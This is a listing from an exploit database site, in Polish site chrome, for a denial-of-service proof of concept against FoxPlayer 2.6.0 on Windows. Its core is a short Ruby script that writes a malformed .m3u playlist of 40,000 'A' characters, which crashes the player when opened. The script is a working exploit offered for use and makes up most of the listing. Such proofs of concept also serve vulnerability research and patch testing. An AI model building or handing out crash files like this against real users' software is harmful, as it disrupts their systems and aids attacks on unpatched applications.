[ autoryzacja ] [ rejestracja ] [ odzyskaj konto ]
Skontaktuj się
Możesz się z nami skonaktować przez:
0day Today  Market Exploitów i Baza Exploitów 0day

FoxPlayer version 2.6.0 Denial of Service

Autor
Ahmed Elhady
Ryzyko
[
Średnie Zagrożenie Bezpieczeństwa
]
0day-ID
0day-ID-17908
Kategoria
dos / poc
Data dodania
01-04-2012
Platforma
windows
Denial of Service in FoxPlayer version 2.6.0
===================================================================================
# Exploit Title:Denial of Service in FoxPlayer version 2.6.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# version: version 2.6.0
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC#######################################
#Foxplayer 2.6.0 suffers form a denial of service vulnerability ,when opening a   #
#malicious .m3u file.                                                             #
###################################################################################
 
#!/usr/bin/ruby
File.open "Crash.m3u" , "w" do |file|
    junk = "A" * 40000
    file.puts junk
end



#  0day.today [2024-07-02]  #